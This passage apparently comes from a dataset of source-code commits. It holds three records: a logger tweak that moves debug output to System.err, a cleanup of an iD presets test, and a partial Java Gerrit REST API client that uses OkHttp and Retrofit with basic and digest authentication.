error( String s ) { log( Level.SEVERE, "{}", new Object[]{s}, null ); } @Override public void error( String s, Object o ) { log( Level.SEVERE, s, new Object[]{o}, null ); } @Override public void error( String s, Object o1, Object o2 ) { log( Level.SEVERE, s, new Object[]{o1,o2}, null ); } @Override public void error( String s, Object... 
objects ) { log( Level.SEVERE, s, objects, null ); } @Override public void error( String s, Throwable t ) { log( Level.SEVERE, "{}", new Object[]{s}, t ); } // private void log( Level level, String format, Object[] objects, Throwable throwable ) { if ( !mLogger.isLoggable( level ) ) return; LogRecord record = new LogRecord( level, slf4jFormatToJulFormat( format ) ); record.setLoggerName( mLogger.getName() ); record.setParameters( objects ); record.setThrown( throwable ); setLogRecordSource( record ); mLogger.log( record ); } // private String slf4jFormatToJulFormat( String format ) { int i = 0; StringBuffer buffer = new StringBuffer(); Pattern pattern = Pattern.compile( "\\{\\s*\\}" ); Matcher matcher = pattern.matcher( format ); while ( matcher.find() ) matcher.appendReplacement( buffer, ("{"+(i++)+"}") ); matcher.appendTail( buffer ); return buffer.toString(); } private void setLogRecordSource( LogRecord record ) { String thisClassName = getClass().getName(); boolean thisClassFound = false; new Throwable().printStackTrace(); StackTraceElement[] elements = new Throwable().getStackTrace(); for ( StackTraceElement element : elements ) { if ( element.getClassName().startsWith( thisClassName ) ) { System.out.println( "FOUND: "+element.toString() ); thisClassFound = true; } else if ( thisClassFound ) { System.out.println( element.toString() ); record.setSourceClassName( element.getClassName() ); record.setSourceMethodName( element.getMethodName() ); break; } } } }
debug stack trace for calls to Logger
lib/src/main/java/com/fighter0ik/slf4jandroid/Logger.java
debug stack trace for calls to Logger
<ide><path>lib/src/main/java/com/fighter0ik/slf4jandroid/Logger.java <ide> { <ide> if ( element.getClassName().startsWith( thisClassName ) ) <ide> { <del> System.out.println( "FOUND: "+element.toString() ); <add> System.err.println( "FOUND: "+element.toString() ); <ide> thisClassFound = true; <ide> } <ide> else if ( thisClassFound ) <ide> { <del> System.out.println( element.toString() ); <add> System.err.println( element.toString() ); <ide> record.setSourceClassName( element.getClassName() ); <ide> record.setSourceMethodName( element.getMethodName() ); <ide> break;
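One aside on the technique the Logger record above depends on: an slf4j-to-java.util.logging bridge typically recovers the real call site by walking the current stack trace and taking the first frame that no longer belongs to the logging facade itself, which is what setLogRecordSource does (the commit merely reroutes its debug output from System.out to System.err). A minimal, standalone sketch of that caller lookup follows; it is not taken from the project above, and the class name CallerFinder is invented.

public final class CallerFinder {
    // Returns the first stack frame that lies outside the logging facade,
    // i.e. the class and method that actually invoked the logger.
    static StackTraceElement findCaller(String facadeClassName) {
        boolean facadeSeen = false;
        for (StackTraceElement element : new Throwable().getStackTrace()) {
            if (element.getClassName().startsWith(facadeClassName)) {
                facadeSeen = true;          // still inside the facade's own frames
            } else if (facadeSeen) {
                return element;             // first frame after the facade: the caller
            }
        }
        return null;                        // no caller found outside the facade
    }
}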
JavaScript
isc
38c208f821793aa8266233ea27db89638d6b81cc
0
digidem/iD,ngageoint/hootenanny-ui,1ec5/iD,bagage/iD,digidem/iD,kartta-labs/iD,AndreasHae/iD,mapmeld/iD,openstreetmap/iD,edpop/iD,zbycz/iD,1ec5/iD,AndreasHae/iD,bagage/iD,zbycz/iD,morray/iD,ngageoint/hootenanny-ui,energiekollektiv/openmod.sh-id,tbicr/iD,kepta/iD,bagage/iD,andreic-telenav/iD,mapmeld/iD,edpop/iD,energiekollektiv/openmod.sh-id,AndreasHae/iD,edpop/iD,openstreetmap/iD,morray/iD,mapmeld/iD,kartta-labs/iD,kartta-labs/iD,1ec5/iD,andreic-telenav/iD,openstreetmap/iD,ngageoint/hootenanny-ui,tbicr/iD,kepta/iD
describe("iD.presets", function() { var p = { point: { tags: {}, geometry: ['point'] }, line: { tags: {}, geometry: ['line'] }, residential: { tags: { highway: 'residential' }, geometry: ['line'] }, park: { tags: { leisure: 'park' }, geometry: ['point', 'area'] } }; var c = iD.presets().load({presets: p}); describe("#match", function() { it("returns a collection containing presets matching a geometry and tags", function() { var way = iD.Way({tags: { highway: 'residential'}}), graph = iD.Graph([way]); expect(c.match(way, graph).id).to.eql('residential'); }); it("returns the appropriate fallback preset when no tags match", function() { var point = iD.Node(), line = iD.Way({tags: {foo: 'bar'}}), graph = iD.Graph([point, line]); expect(c.match(point, graph).id).to.eql('point'); expect(c.match(line, graph).id).to.eql('line'); }); }); });
test/spec/presets.js
describe("iD.presets", function() { var p = { point: { tags: {}, geometry: ['point'] }, line: { tags: {}, geometry: ['line'] }, residential: { tags: { highway: 'residential' }, geometry: ['line'] }, park: { tags: { leisure: 'park' }, geometry: ['point', 'area'] } }; var c = iD.presets().load({presets: p}), w = iD.Way({tags: { highway: 'residential'}}), g = iD.Graph().replace(w); describe("#match", function() { it("returns a collection containing presets matching a geometry and tags", function() { var way = iD.Way({tags: { highway: 'residential'}}), graph = iD.Graph([way]); expect(c.match(way, graph).id).to.eql('residential'); }); it("returns the appropriate fallback preset when no tags match", function() { var point = iD.Node(), line = iD.Way({tags: {foo: 'bar'}}), graph = iD.Graph([point, line]); expect(c.match(point, graph).id).to.eql('point'); expect(c.match(line, graph).id).to.eql('line'); }); }); });
Remove unused
test/spec/presets.js
Remove unused
<ide><path>test/spec/presets.js <ide> } <ide> }; <ide> <del> var c = iD.presets().load({presets: p}), <del> w = iD.Way({tags: { highway: 'residential'}}), <del> g = iD.Graph().replace(w); <add> var c = iD.presets().load({presets: p}); <ide> <ide> describe("#match", function() { <ide> it("returns a collection containing presets matching a geometry and tags", function() {
Java
apache-2.0
e6ef09de28ee0a2583f041b697b505fedfaf0bb0
0
jruesga/rview,jruesga/rview,jruesga/rview
/* * Copyright (C) 2016 Jorge Ruesga * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.ruesga.rview.gerrit; import android.net.Uri; import android.support.annotation.NonNull; import android.support.annotation.Nullable; import android.text.format.DateUtils; import com.burgstaller.okhttp.AuthenticationCacheInterceptor; import com.burgstaller.okhttp.CachingAuthenticatorDecorator; import com.burgstaller.okhttp.DispatchingAuthenticator; import com.burgstaller.okhttp.basic.BasicAuthenticator; import com.burgstaller.okhttp.digest.CachingAuthenticator; import com.burgstaller.okhttp.digest.Credentials; import com.burgstaller.okhttp.digest.DigestAuthenticator; import com.google.gson.annotations.Since; import com.ruesga.rview.gerrit.filter.AccountQuery; import com.ruesga.rview.gerrit.filter.ChangeQuery; import com.ruesga.rview.gerrit.filter.GroupQuery; import com.ruesga.rview.gerrit.filter.Option; import com.ruesga.rview.gerrit.model.*; import java.util.ArrayList; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; import okhttp3.Interceptor; import okhttp3.OkHttpClient; import okhttp3.Request; import okhttp3.RequestBody; import okhttp3.ResponseBody; import okhttp3.logging.HttpLoggingInterceptor; import retrofit2.Retrofit; import retrofit2.adapter.rxjava.RxJavaCallAdapterFactory; import retrofit2.converter.gson.GsonConverterFactory; import rx.Observable; public class GerritApiClient implements GerritApi { private final String mEndPoint; private final GerritApi mService; private final PlatformAbstractionLayer mAbstractionLayer; private long mLastServerVersionCheck = 0; ServerVersion mServerVersion; private final ApiVersionMediator mMediator = new ApiVersionMediator() { @Override public WhitespaceType resolveWhiteSpaceType(WhitespaceType type) { if (mServerVersion.getVersion() < 2.12) { return null; } return type; } @Override public IgnoreWhitespaceType resolveIgnoreWhiteSpaceType(IgnoreWhitespaceType type) { if (mServerVersion.getVersion() >= 2.12) { return null; } return type; } }; public GerritApiClient(String endpoint, Authorization authorization, PlatformAbstractionLayer abstractionLayer) { mAbstractionLayer = abstractionLayer; mEndPoint = endpoint; DispatchingAuthenticator authenticator = null; if (authorization != null && !authorization.isAnonymousUser()) { final Credentials credentials = new Credentials( authorization.mUsername, authorization.mPassword); final BasicAuthenticator basicAuthenticator = new BasicAuthenticator(credentials); final DigestAuthenticator digestAuthenticator = new DigestAuthenticator(credentials); authenticator = new DispatchingAuthenticator.Builder() .with("digest", digestAuthenticator) .with("basic", basicAuthenticator) .build(); } // OkHttp client OkHttpClient.Builder clientBuilder = OkHttpHelper.getSafeClientBuilder(); clientBuilder.followRedirects(true) .readTimeout(60000, java.util.concurrent.TimeUnit.MILLISECONDS) .followSslRedirects(true) .addInterceptor(createConnectivityCheckInterceptor()) 
.addInterceptor(createLoggingInterceptor()) .addInterceptor(createHeadersInterceptor()); if (authorization != null && !authorization.isAnonymousUser()) { final Map<String, CachingAuthenticator> authCache = new ConcurrentHashMap<>(); clientBuilder .authenticator(new CachingAuthenticatorDecorator(authenticator, authCache)) .addInterceptor(new AuthenticationCacheInterceptor(authCache)); } OkHttpClient client = clientBuilder.build(); // Gson adapter GsonConverterFactory gsonFactory = GsonConverterFactory.create( GsonHelper.createGerritGsonBuilder(true, mAbstractionLayer).create()); // RxJava adapter RxJavaCallAdapterFactory rxAdapter = RxJavaCallAdapterFactory.create(); // Retrofit Retrofit retrofit = new Retrofit.Builder() .baseUrl(endpoint) .client(client) .addConverterFactory(gsonFactory) .addCallAdapterFactory(rxAdapter) .build(); // Build the api mService = retrofit.create(GerritApi.class); } private HttpLoggingInterceptor createLoggingInterceptor() { HttpLoggingInterceptor logging = new HttpLoggingInterceptor(mAbstractionLayer::log); logging.setLevel(mAbstractionLayer.isDebugBuild() ? HttpLoggingInterceptor.Level.BODY : HttpLoggingInterceptor.Level.BASIC); return logging; } private Interceptor createHeadersInterceptor() { return chain -> { Request original = chain.request(); Request.Builder requestBuilder = original.newBuilder(); if (!mAbstractionLayer.isDebugBuild()) { requestBuilder.header("Accept", "application/json"); } Request request = requestBuilder.build(); return chain.proceed(request); }; } private Interceptor createConnectivityCheckInterceptor() { return chain -> { if (!mAbstractionLayer.hasConnectivity()) { throw new NoConnectivityException(); } return chain.proceed(chain.request()); }; } private <T> Observable<T> withVersionRequestCheck(final Observable<T> observable) { return Observable.fromCallable(() -> { long now = System.currentTimeMillis(); if (mServerVersion == null || (now - mLastServerVersionCheck > DateUtils.DAY_IN_MILLIS)) { mServerVersion = getServerVersion().toBlocking().first(); mLastServerVersionCheck = now; } return observable.toBlocking().first(); }); } private Observable<ServerVersion> andCacheVersion(final Observable<ServerVersion> observable) { return Observable.fromCallable(() -> { mServerVersion = observable.toBlocking().first(); return mServerVersion; }); } @SuppressWarnings("unchecked") private <T> List<T> filterByVersion(List<T> o) { if (o == null) { return null; } if (mServerVersion == null) { mServerVersion = getServerVersion().toBlocking().first(); } ArrayList<T> filter = new ArrayList<>(o.size()); for (T t : o) { boolean isSupported = true; try { Since a = t.getClass().getDeclaredField(t.toString()).getAnnotation(Since.class); if (a != null && a.value() > mServerVersion.getVersion()) { isSupported = false; } } catch (Exception e) { // Ignore } if (isSupported) { filter.add(t); } } return filter; } // =============================== // Non-Api operations // =============================== private String toUnauthenticatedEndpoint(String endPoint) { return endPoint.endsWith("/a/") ? 
endPoint.substring(0, endPoint.length() - 2) : endPoint; } @Override public Uri getChangeUri(@NonNull String changeId) { return Uri.parse(String.format(Locale.US, "%s#/c/%s", toUnauthenticatedEndpoint(mEndPoint), changeId)); } @Override public Uri getRevisionUri(@NonNull String changeId, @NonNull String revisionNumber) { return Uri.parse(String.format(Locale.US, "%s#/c/%s/%s", toUnauthenticatedEndpoint(mEndPoint), changeId, revisionNumber)); } @Override public Uri getDownloadRevisionUri( @NonNull String changeId, @NonNull String revisionId, @NonNull DownloadFormat format) { return Uri.parse(String.format(Locale.US, "%schanges/%s/revisions/%s/archive?format=%s", toUnauthenticatedEndpoint(mEndPoint), changeId, revisionId, format.toString().toLowerCase())); } @Override public ApiVersionMediator getApiVersionMediator() { return mMediator; } // =============================== // Gerrit access endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-access.html" // =============================== @Override public Observable<Map<String, ProjectAccessInfo>> getAccessRights(@NonNull String[] names) { return withVersionRequestCheck(mService.getAccessRights(names)); } // =============================== // Gerrit accounts endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-accounts.html" // =============================== @Override public Observable<List<AccountInfo>> getAccountsSuggestions( @NonNull String query, @Nullable Integer count) { return withVersionRequestCheck(mService.getAccountsSuggestions(query, count)); } @Override public Observable<List<AccountInfo>> getAccounts( @NonNull AccountQuery query, @Nullable Integer count, @Nullable Integer start, @Nullable List<AccountOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getAccounts(query, count, start, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<AccountInfo> getAccount(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccount(accountId)); } @Override public Observable<AccountInfo> createAccount( @NonNull String username, @NonNull AccountInput input) { return withVersionRequestCheck(mService.createAccount(username, input)); } @Override public Observable<AccountDetailInfo> getAccountDetails(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountDetails(accountId)); } @Override public Observable<String> getAccountName(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountName(accountId)); } @Override public Observable<String> setAccountName( @NonNull String accountId, @NonNull AccountNameInput input) { return withVersionRequestCheck(mService.setAccountName(accountId, input)); } @Override public Observable<Void> deleteAccountName(@NonNull String accountId) { return withVersionRequestCheck(mService.deleteAccountName(accountId)); } @Override public Observable<String> getAccountUsername(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountUsername(accountId)); } @Override public Observable<String> setAccountUsername( @NonNull String accountId, @NonNull UsernameInput input) { return withVersionRequestCheck(mService.setAccountUsername(accountId, input)); } @Override public Observable<String> isAccountActive(@NonNull String accountId) { return withVersionRequestCheck(mService.isAccountActive(accountId)); } @Override public Observable<Void> setAccountAsActive(@NonNull String accountId) { return 
withVersionRequestCheck(mService.setAccountAsActive(accountId)); } @Override public Observable<Void> setAccountAsInactive(@NonNull String accountId) { return withVersionRequestCheck(mService.setAccountAsInactive(accountId)); } @Override public Observable<String> getHttpPassword(@NonNull String accountId) { return withVersionRequestCheck(mService.getHttpPassword(accountId)); } @Override public Observable<String> setHttpPassword( @NonNull String accountId, @NonNull HttpPasswordInput input) { return withVersionRequestCheck(mService.setHttpPassword(accountId, input)); } @Override public Observable<Void> deleteHttpPassword(@NonNull String accountId) { return withVersionRequestCheck(mService.deleteHttpPassword(accountId)); } @Override public Observable<OAuthTokenInfo> getOAuthToken(@NonNull String accountId) { return withVersionRequestCheck(mService.getOAuthToken(accountId)); } @Override public Observable<List<EmailInfo>> getAccountEmails(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountEmails(accountId)); } @Override public Observable<EmailInfo> getAccountEmail( @NonNull String accountId, @NonNull String emailId) { return withVersionRequestCheck(mService.getAccountEmail(accountId, emailId)); } @Override public Observable<EmailInfo> createAccountEmail(@NonNull String accountId, @NonNull String emailId, @NonNull EmailInput input) { return withVersionRequestCheck(mService.createAccountEmail(accountId, emailId, input)); } @Override public Observable<Void> deleteAccountEmail(@NonNull String accountId, @NonNull String emailId) { return withVersionRequestCheck(mService.deleteAccountEmail(accountId, emailId)); } @Override public Observable<Void> setAccountPreferredEmail( @NonNull String accountId, @NonNull String emailId) { return withVersionRequestCheck(mService.setAccountPreferredEmail(accountId, emailId)); } @Override public Observable<List<SshKeyInfo>> getAccountSshKeys(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountSshKeys(accountId)); } @Override public Observable<SshKeyInfo> getAccountSshKey(@NonNull String accountId, int sshKeyId) { return withVersionRequestCheck(mService.getAccountSshKey(accountId, sshKeyId)); } @Override public Observable<SshKeyInfo> addAccountSshKey( @NonNull String accountId, @NonNull String encodedKey) { return withVersionRequestCheck(mService.addAccountSshKey(accountId, encodedKey)); } @Override public Observable<Void> deleteAccountSshKey(@NonNull String accountId, int sshKeyId) { return withVersionRequestCheck(mService.deleteAccountSshKey(accountId, sshKeyId)); } @Override public Observable<List<GpgKeyInfo>> getAccountGpgKeys(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountGpgKeys(accountId)); } @Override public Observable<GpgKeyInfo> getAccountGpgKey( @NonNull String accountId, @NonNull String gpgKeyId) { return withVersionRequestCheck(mService.getAccountGpgKey(accountId, gpgKeyId)); } @Override public Observable<Map<String, GpgKeyInfo>> addAccountGpgKeys( @NonNull String accountId, @NonNull AddGpgKeyInput input) { return withVersionRequestCheck(mService.addAccountGpgKeys(accountId, input)); } @Override public Observable<Map<String, GpgKeyInfo>> deleteAccountGpgKeys( @NonNull String accountId, @NonNull DeleteGpgKeyInput input) { return withVersionRequestCheck(mService.deleteAccountGpgKeys(accountId, input)); } @Override public Observable<AccountCapabilityInfo> getAccountCapabilities( @NonNull String accountId, @Nullable List<Capability> filter) { return 
withVersionRequestCheck(Observable.fromCallable( () -> mService.getAccountCapabilities(accountId, filterByVersion(filter)) .toBlocking().first())); } @Override public Observable<String> hasAccountCapability( @NonNull String accountId, @NonNull Capability capabilityId) { return withVersionRequestCheck(mService.hasAccountCapability(accountId, capabilityId)); } @Override public Observable<List<GroupInfo>> getAccountGroups(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountGroups(accountId)); } @Override public Observable<ResponseBody> getAccountAvatar( @NonNull String accountId, @Nullable Integer size) { return withVersionRequestCheck(mService.getAccountAvatar(accountId, size)); } @Override public Observable<String> getAccountAvatarChangeUrl(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountAvatarChangeUrl(accountId)); } @Override public Observable<PreferencesInfo> getAccountPreferences(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountPreferences(accountId)); } @Override public Observable<PreferencesInfo> setAccountPreferences( @NonNull String accountId, @NonNull PreferencesInput input) { return withVersionRequestCheck(mService.setAccountPreferences(accountId, input)); } @Override public Observable<DiffPreferencesInfo> getAccountDiffPreferences(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountDiffPreferences(accountId)); } @Override public Observable<DiffPreferencesInfo> setAccountDiffPreferences( @NonNull String accountId, @NonNull DiffPreferencesInput input) { return withVersionRequestCheck(mService.setAccountDiffPreferences(accountId, input)); } @Override public Observable<EditPreferencesInfo> getAccountEditPreferences(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountEditPreferences(accountId)); } @Override public Observable<EditPreferencesInfo> setAccountEditPreferences( @NonNull String accountId, @NonNull EditPreferencesInput input) { return withVersionRequestCheck(mService.setAccountEditPreferences(accountId, input)); } @Override public Observable<List<ProjectWatchInfo>> getAccountWatchedProjects(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountWatchedProjects(accountId)); } @Override public Observable<List<ProjectWatchInfo>> addOrUpdateAccountWatchedProjects( @NonNull String accountId, @NonNull List<ProjectWatchInput> input) { return withVersionRequestCheck(mService.addOrUpdateAccountWatchedProjects(accountId, input)); } @Override public Observable<Void> deleteAccountWatchedProjects( @NonNull String accountId, @NonNull List<DeleteProjectWatchInput> input) { return withVersionRequestCheck(mService.deleteAccountWatchedProjects(accountId, input)); } @Override public Observable<List<ChangeInfo>> getDefaultStarredChanges(@NonNull String accountId) { return withVersionRequestCheck(mService.getDefaultStarredChanges(accountId)); } @Override public Observable<Void> putDefaultStarOnChange( @NonNull String accountId, @NonNull String changeId) { return withVersionRequestCheck(mService.putDefaultStarOnChange(accountId, changeId)); } @Override public Observable<Void> deleteDefaultStarFromChange( @NonNull String accountId, @NonNull String changeId) { return withVersionRequestCheck(mService.deleteDefaultStarFromChange(accountId, changeId)); } @Override public Observable<List<ChangeInfo>> getStarredChanges(@NonNull String accountId) { return withVersionRequestCheck(mService.getStarredChanges(accountId)); } @Override public 
Observable<List<String>> getStarLabelsFromChange( @NonNull String accountId, @NonNull String changeId) { return withVersionRequestCheck(mService.getStarLabelsFromChange(accountId, changeId)); } @Override public Observable<List<String>> updateStarLabelsFromChange(@NonNull String accountId, @NonNull String changeId, @NonNull StarInput input) { return withVersionRequestCheck(mService.updateStarLabelsFromChange(accountId, changeId, input)); } @Override public Observable<List<ContributorAgreementInfo>> getContributorAgreements( @NonNull String accountId) { return withVersionRequestCheck(mService.getContributorAgreements(accountId)); } @Override public Observable<String> signContributorAgreement( @NonNull String accountId, @NonNull ContributorAgreementInput input) { return withVersionRequestCheck(mService.signContributorAgreement(accountId, input)); } // =============================== // Gerrit changes endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-changes.html" // =============================== @Override public Observable<ChangeInfo> createChange(@NonNull ChangeInput input) { return withVersionRequestCheck(mService.createChange(input)); } @Override public Observable<List<ChangeInfo>> getChanges( @NonNull ChangeQuery query, @Nullable Integer count, @Nullable Integer start, @Nullable List<ChangeOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getChanges(query, count, start, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<ChangeInfo> getChange( @NonNull String changeId, @Nullable List<ChangeOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getChange(changeId, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<ChangeInfo> getChangeDetail( @NonNull String changeId, @Nullable List<ChangeOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getChangeDetail(changeId, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<String> getChangeTopic(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeTopic(changeId)); } @Override public Observable<String> setChangeTopic(@NonNull String changeId, @NonNull TopicInput input) { return withVersionRequestCheck(mService.setChangeTopic(changeId, input)); } @Override public Observable<Void> deleteChangeTopic(@NonNull String changeId) { return withVersionRequestCheck(mService.deleteChangeTopic(changeId)); } @Override public Observable<ChangeInfo> abandonChange( @NonNull String changeId, @NonNull AbandonInput input) { return withVersionRequestCheck(mService.abandonChange(changeId, input)); } @Override public Observable<ChangeInfo> restoreChange( @NonNull String changeId, @NonNull RestoreInput input) { return withVersionRequestCheck(mService.restoreChange(changeId, input)); } @Override public Observable<ChangeInfo> rebaseChange( @NonNull String changeId, @Nullable RebaseInput input) { return withVersionRequestCheck(mService.rebaseChange(changeId, input)); } @Override public Observable<ChangeInfo> moveChange( @NonNull String changeId, @NonNull MoveInput input) { return withVersionRequestCheck(mService.moveChange(changeId, input)); } @Override public Observable<ChangeInfo> revertChange( @NonNull String changeId, @NonNull RevertInput input) { return withVersionRequestCheck(mService.revertChange(changeId, input)); } @Override public Observable<ChangeInfo> submitChange( @NonNull String changeId, @NonNull 
SubmitInput input) { return withVersionRequestCheck(mService.submitChange(changeId, input)); } @Override public Observable<List<ChangeInfo>> getChangesSubmittedTogether( @NonNull String changeId, @Nullable List<SubmittedTogetherOptions> options) { return withVersionRequestCheck(mService.getChangesSubmittedTogether(changeId, options)); } @Override public Observable<Void> publishDraftChange(@NonNull String changeId) { return withVersionRequestCheck(mService.publishDraftChange(changeId)); } @Override public Observable<Void> deleteDraftChange(@NonNull String changeId) { return withVersionRequestCheck(mService.deleteDraftChange(changeId)); } @Override public Observable<IncludeInInfo> getChangeIncludedIn(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeIncludedIn(changeId)); } @Override public Observable<Void> indexChange(@NonNull String changeId) { return withVersionRequestCheck(mService.indexChange(changeId)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeComments(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeComments(changeId)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeDraftComments( @NonNull String changeId) { return withVersionRequestCheck(mService.getChangeDraftComments(changeId)); } @Override public Observable<ChangeInfo> checkChange(@NonNull String changeId) { return withVersionRequestCheck(mService.checkChange(changeId)); } @Override public Observable<ChangeInfo> fixChange(@NonNull String changeId, @NonNull FixInput input) { return withVersionRequestCheck(mService.fixChange(changeId, input)); } @Override public Observable<EditInfo> getChangeEdit(@NonNull String changeId, @Nullable Option list, @Nullable String base, @Nullable Option downloadCommands) { return withVersionRequestCheck(mService.getChangeEdit( changeId, list, base, downloadCommands)); } @Override public Observable<Void> setChangeEdit( @NonNull String changeId, @NonNull String fileId, @NonNull RequestBody data) { return withVersionRequestCheck(mService.setChangeEdit(changeId, fileId, data)); } @Override public Observable<Void> restoreChangeEdit( @NonNull String changeId, @NonNull RestoreChangeEditInput input) { return withVersionRequestCheck(mService.restoreChangeEdit(changeId, input)); } @Override public Observable<Void> renameChangeEdit( @NonNull String changeId, @NonNull RenameChangeEditInput input) { return withVersionRequestCheck(mService.renameChangeEdit(changeId, input)); } @Override public Observable<Void> newChangeEdit( @NonNull String changeId, @NonNull NewChangeEditInput input) { return withVersionRequestCheck(mService.newChangeEdit(changeId, input)); } @Override public Observable<Void> deleteChangeEditFile(@NonNull String changeId, @NonNull String fileId) { return withVersionRequestCheck(mService.deleteChangeEditFile(changeId, fileId)); } @Override public Observable<Base64Data> getChangeEditFileContent( @NonNull String changeId, @NonNull String fileId, @Nullable String base) { return withVersionRequestCheck(mService.getChangeEditFileContent(changeId, fileId, base)); } @Override public Observable<EditFileInfo> getChangeEditFileMetadata( @NonNull String changeId, @NonNull String fileId) { return withVersionRequestCheck(mService.getChangeEditFileMetadata(changeId, fileId)); } @Override public Observable<String> getChangeEditMessage(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeEditMessage(changeId)); } @Override public Observable<Void> setChangeEditMessage( @NonNull String 
changeId, @NonNull ChangeEditMessageInput input) { return withVersionRequestCheck(mService.setChangeEditMessage(changeId, input)); } @Override public Observable<Void> publishChangeEdit(@NonNull String changeId) { return withVersionRequestCheck(mService.publishChangeEdit(changeId)); } @Override public Observable<Void> rebaseChangeEdit(@NonNull String changeId) { return withVersionRequestCheck(mService.rebaseChangeEdit(changeId)); } @Override public Observable<Void> deleteChangeEdit(@NonNull String changeId) { return withVersionRequestCheck(mService.deleteChangeEdit(changeId)); } @Override public Observable<List<ReviewerInfo>> getChangeReviewers(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeReviewers(changeId)); } @Override public Observable<List<SuggestedReviewerInfo>> getChangeSuggestedReviewers( @NonNull String changeId, @NonNull String query, @Nullable Integer count) { return withVersionRequestCheck( mService.getChangeSuggestedReviewers(changeId, query, count)); } @Override public Observable<List<ReviewerInfo>> getChangeReviewer( @NonNull String changeId, @NonNull String accountId) { return withVersionRequestCheck(mService.getChangeReviewer(changeId, accountId)); } @Override public Observable<AddReviewerResultInfo> addChangeReviewer( @NonNull String changeId, @NonNull ReviewerInput input) { return withVersionRequestCheck(mService.addChangeReviewer(changeId, input)); } @Override public Observable<Void> deleteChangeReviewer( @NonNull String changeId, @NonNull String accountId) { return withVersionRequestCheck(mService.deleteChangeReviewer(changeId, accountId)); } @Override public Observable<Map<String, Integer>> getChangeReviewerVotes( @NonNull String changeId, @NonNull String accountId) { return withVersionRequestCheck(mService.getChangeReviewerVotes(changeId, accountId)); } @Override public Observable<Void> deleteChangeReviewerVote(@NonNull String changeId, @NonNull String accountId, @NonNull String labelId, @NonNull DeleteVoteInput input) { return withVersionRequestCheck( mService.deleteChangeReviewerVote(changeId, accountId, labelId, input)); } @Override public Observable<CommitInfo> getChangeRevisionCommit( @NonNull String changeId, @NonNull String revisionId, @Nullable Option links) { return withVersionRequestCheck( mService.getChangeRevisionCommit(changeId, revisionId, links)); } @Override public Observable<Map<String, ActionInfo>> getChangeRevisionActions( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionActions(changeId, revisionId)); } @Override public Observable<ChangeInfo> getChangeRevisionReview( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionReview(changeId, revisionId)); } @Override public Observable<ReviewInfo> setChangeRevisionReview(@NonNull String changeId, @NonNull String revisionId, @NonNull ReviewInput input) { return withVersionRequestCheck( mService.setChangeRevisionReview(changeId, revisionId, input)); } @Override public Observable<RelatedChangesInfo> getChangeRevisionRelatedChanges( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck( mService.getChangeRevisionRelatedChanges(changeId, revisionId)); } @Override public Observable<ChangeInfo> rebaseChangeRevision( @NonNull String changeId, @NonNull String revisionId, @NonNull RebaseInput input) { return withVersionRequestCheck(mService.rebaseChangeRevision(changeId, revisionId, input)); } @Override public 
Observable<SubmitInfo> submitChangeRevision( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.submitChangeRevision(changeId, revisionId)); } @Override public Observable<SubmitInfo> publishChangeDraftRevision( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.publishChangeDraftRevision(changeId, revisionId)); } @Override public Observable<SubmitInfo> deleteChangeDraftRevision( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.deleteChangeDraftRevision(changeId, revisionId)); } @Override public Observable<Base64Data> getChangeRevisionPatch(@NonNull String changeId, @NonNull String revisionId, @Nullable Option zip, @Nullable Option download) { return withVersionRequestCheck( mService.getChangeRevisionPatch(changeId, revisionId, zip, download)); } @Override public Observable<MergeableInfo> getChangeRevisionMergeableStatus(@NonNull String changeId, @NonNull String revisionId, @Nullable Option otherBranches) { return withVersionRequestCheck( mService.getChangeRevisionMergeableStatus(changeId, revisionId, otherBranches)); } @Override public Observable<SubmitType> getChangeRevisionSubmitType( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionSubmitType(changeId, revisionId)); } @Override public Observable<SubmitType> testChangeRevisionSubmitType(@NonNull String changeId, @NonNull String revisionId, @NonNull RuleInput input) { return withVersionRequestCheck( mService.testChangeRevisionSubmitType(changeId, revisionId, input)); } @Override public Observable<List<SubmitRecordInfo>> testChangeRevisionSubmitRule( @NonNull String changeId, @NonNull String revisionId, @NonNull RuleInput input) { return withVersionRequestCheck( 